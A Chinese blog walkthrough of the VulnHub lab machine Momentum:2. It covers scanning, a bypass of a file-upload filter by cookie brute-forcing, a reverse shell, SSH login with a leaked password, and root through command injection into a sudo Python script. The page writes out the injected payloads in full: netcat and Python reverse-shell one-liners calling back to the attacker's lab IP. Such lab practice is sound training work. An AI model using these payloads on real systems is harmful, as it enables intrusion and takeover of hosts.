VulbHub日记(十七):Momentum:2

最新推荐文章于 2023-02-27 23:35:17 发布
最新推荐文章于 2023-02-27 23:35:17 发布
阅读量2.5k 收藏 1
点赞数
分类专栏: VlunHub日记 文章标签: linux web安全 python php js
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44107836/article/details/121591595
版权

参考链接

Vulnhub:Momentum:2
参考博客1
参考博客2

开始练习

本机ip:192.168.56.102
目的机ip:192.168.56.139

fping -aqg 192.168.56.0/24

在这里插入图片描述

nmap 扫描主机

nmap -A -p- 192.168.56.139


gobuster扫目录

gobuster dir -u http://192.168.56.139/ -x html,txt,php,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log

在这里插入图片描述

dashboard.html可以上传文件
在这里插入图片描述
/js/main.js是文件上传的代码,没有什么限制,主要通过ajax.php传输,保存在之前扫描到的/owls文件夹,如果传输成功,返回1,但是实际测试时却只能传txt文件,所以应该是ajax.php有文件类型限制
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
有一个之前没有发现的ajax.php.bak文件,可以下载到本地,就知道了后缀限制方式

curl http://192.168.56.139/ajax.php.bak
#或者浏览器直接访问下载

在这里插入图片描述

随意上传一个php文件,Bp抓包放入repeater,添加对应字段
在这里插入图片描述
在这里插入图片描述
再放入intruder爆破cookie的最后一位
在这里插入图片描述
在这里插入图片描述
成功上传,将文件换为反向shell

nc -nvlp 4396

在这里插入图片描述
在这里插入图片描述
/home/athena目录下,userFLAG和一个password-reminder.txt
在这里插入图片描述
考验词汇量了
在这里插入图片描述

#密码 myvulnerableapp*
ssh 192.168.56.139 -l ahtena
sudo -l

在这里插入图片描述
随机生成cookie并把输入的seed保存在log.txt中

cat /home/team-tasks/cookie-gen.py

在这里插入图片描述
重点是红框中的代码,它需要用户输入seed,于是创建了一个进程,用于输入,但是它同时也是一个当前运行用户的shell,如果使用root用户执行该文件,就可以利用这个输入框弹出root的shell

# ";"闭合之前的输入,或者&&命令
#再利用netcat弹shell
;nc 192.168.56.102 4396 -e /bin/bash   					
&& nc 192.168.56.102 4396 -e /bin/bash
#也可以使用pyhon弹shell
;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",4396));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
&& python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",4396));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述

拿到root FLAG
在这里插入图片描述

Dawn_Xiiii
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulhub安装过程——让人头大的问题
四喜的博客
06-04 3471
环境:虚拟机 OS: centos7 1)跟着百度走,到开启漏洞环境 #docker-compose up -d ,出现以上图片问题。 解决方法:百度说paramiko模块2.4版本无法识别gssapi,将paramiko版本降低 #pip install paramiko==2.0.2 。 2)打开环境,网页...
推荐一款创新的可视化工具 - V-HUD
最新发布
gitblog_00005的博客
03-05 379
推荐一款创新的可视化工具 - V-HUD V-HUD是一个开源的、基于Unity的游戏内抬头显示(Head-Up Display)系统,为游戏开发者提供了丰富的功能和高度定制化的能力。 项目简介 V-HUD提供了一种简单的方式在游戏中实现抬头显示器的功能,可以用于展示玩家的生命值、能量条、经验值等各种信息。该项目通过Unity引擎开发,可以在各种平台上运行,包括桌面端、移动设备和虚拟现实平台。 除...
教你怎么用Vulnhub来搭建环境
热门推荐
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
【甄选靶场】 Vulnhub百个项目渗透——项目三十五:vulnerable_docker_containement-1(文件上传,docker提权)
人间体佐菲的博客
10-08 704
【甄选靶场】 Vulnhub百个项目渗透——项目三十五:vulnerable_docker_containement-1(文件上传,docker提权)
Vulbhub-hackNos
wwxxss
02-25 145
接下来的思路就是先把靶机的passwd文件搞过来,在其中创建一个新用户,然后把新的passwd文件还回去即可在靶机上获取一个高权限用户。蚁剑连接后,我无法尝试反弹shell,在此我们了解到一个新工具weevely也可以进行反弹shell。蚁剑连接成功后,我们需要进行提权,首先在kali中监听端口,进行反弹shell。可以看到用户泄露,我们对admin进行解密得到其密码为admin 123。解密后还是一个加密是一个brainfuck加密,我们使用许愿星进行解密。因此我们可以进行上传马,我们使用蚁剑连接。
网站:Momentum Mod的主要网站
02-04
Momentum Mod是基于源引擎构建的独立游戏,旨在集中化CS:S,CS:GO和TF2中的移动游戏类型。 这是Momentum Mod主网站的存储库,它是的中央枢纽和扩展。 Momentum主站点的前端充当游戏的扩展,允许玩家通过Steam...
推进:Momentum Chrome扩展程序克隆
02-13
推进力Momentum Chrome扩展程序克隆建造和设计使用HTML CSS JavaScript用法运行扩展的步骤: 在您的Google chrome网络浏览器中打开chrome:// extensions /。 下载存储库的zip文件并解压缩(或仅克隆存储库)。 在...
productivity:Momentum Chrome扩展程序的自定义版本
05-03
生产率++,一种免费的极简解决方案,旨在优化您的工作。 :information: 关于 你好! 这是我个人对新的Tab生产力chrome扩展程序的看法。 基于Pomodoro方法和我的极简主义思想,此扩展将把您的工作流程提升到一个全新...
Currency Converter: Momentum Strategy-crx插件
04-04
语言:English (UK) 转换网页上的货币并转换您自己的货币。 选择您的货币并在许多网页上自动转换外币,或者输入您自己的数字并获取最新的货币转换。
game:Momentum Mod - 独立源运动 Speedrunning(请阅读自述文件)
08-05
Momentum Mod 是一款基于 Source 引擎的免费独立游戏,集中了反恐精英、半条命、军团要塞和泰坦陨落等游戏中的主要运动游戏类型。 团队更新 Momentum Mod 获得了 Valve 的引擎访问权限! 您可以在一切意味着,但这...
Vulbhub-DomDom
wwxxss
02-27 144
我们使用php代码进行建立反弹shell,因为是post传参所以对其进行url编码。我们把/index.php/index.php 改为 /admin.php。这里可以使用脏牛提权,但是我这里用新的一种查看root目录的方式,根据网站提示这是一个登录用户的界面,我们接着扫描一下网站的目录。因为靶机就开了一个80端口,因此我们只能从这三个文件中找漏洞。我们可以看见/bin/tar这说明可以对文件进行读写。开放了80端口web服务,我们访问靶机的网站。在一顿瞎试的情况下,找到了一个命令执行漏洞。
VulbHub日记(七):Looz
Dawn_Xi的博客
09-13 247
靶机介绍 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.116 fping -aqg 192.168.56.0/24
VulnHub DC4
baynk的博客
05-18 329
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-4,313/ 下载地址2:https://pan.baidu.com/s/1VSecvfMlV7dN1-W7YlxrHg 提取码: tiwz 只有一个flag,但是给了多个切入点。 开肝。 0x01 渗透流程 nmap走起 服务端口继续扫 这次有两个端口存在,不可能ssh弱密码吧,还是先来80了。 只有这么一个登陆界面,试了SQL什么都没反应,sqlmap也一把梭过了,啥都没。通过页面的信息收集也找
vulhub - SECARMY VILLAGE: GRAYHAT CONFERENCE writeup
Jiajiajiang_的博客
05-24 861
主机发现 && 端口扫描 netdiscover -i eth0 -r 192.168.154.1/24 端口扫描这次用的是threader3000 https://blog.csdn.net/Jiajiajiang_/article/details/117220625 好用 ------------------------------------------------------------ Threader 3000 - Multi-threaded.
vulnhub之DC5
底层社会中的弱智
01-20 508
在前面的总结,遇见多参数的传值,可以尝试wfuzz来查看是否存在隐藏参数或者检测LFI漏洞 找到目标机器的IP为192.168.1.110 使用nmap来扫描一下开放的端口以及服务 80端口http服务(敏感目录爆破,十大常规漏洞的检测,中间件解析漏洞) 111端口rpc服务 NFS网络文件共享(showmount -a ip来查看具体的文件) 我先使用showmount命令来查看一下...
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7673
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
Vulnhub-DC-2靶场渗透练习
weixin_52451257的博客
11-13 3592
Vulbhub-DC2 靶场地址:DC: 2 ~ VulnHub 根据提示 需要把靶机的IP和 域名绑定 修改hosts文件 Vi /etc/hosts 靶机ip dc-2 第一步:信息收集 nmap –sS 192.168.231.0/24 nmap -A -p- 192.168.231.140 扫描目录信息, 扫描目录目前掌握 dirb,nikto,dirmap,dirsearch dirb http://192.168.231.140 nikto -h htt...
vulnhub之connect-the-dots
底层社会中的弱智
01-02 1356
万物皆有思路!思路最关键!其次就是运气了! 信息收集:使用nmap工具先找到目标IP,然后查看目标IP开放的端口-服务-版本以及目标操作系统也要知道 实施攻击:根据收集到的端口对应的服务开始攻击 让我们在局域网中先找到目标吧! 使用nmap扫描一下 nmap -Pn 你所在网段 找到目标主机了是172.16.12.14,我们来看看他开放了那一些端口? nmap -p- -sT -s...
逃离saddle point的方法二:momentum
09-21
对于逃离Saddle Point的方法之一是使用momentum(动量)方法。Momentum方法是一种基于动量思想的优化算法,在深度学习领域中常被使用。 Momentum算法通过引入动量来加速梯度下降的速度,从而更快地逃离Saddle Point...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值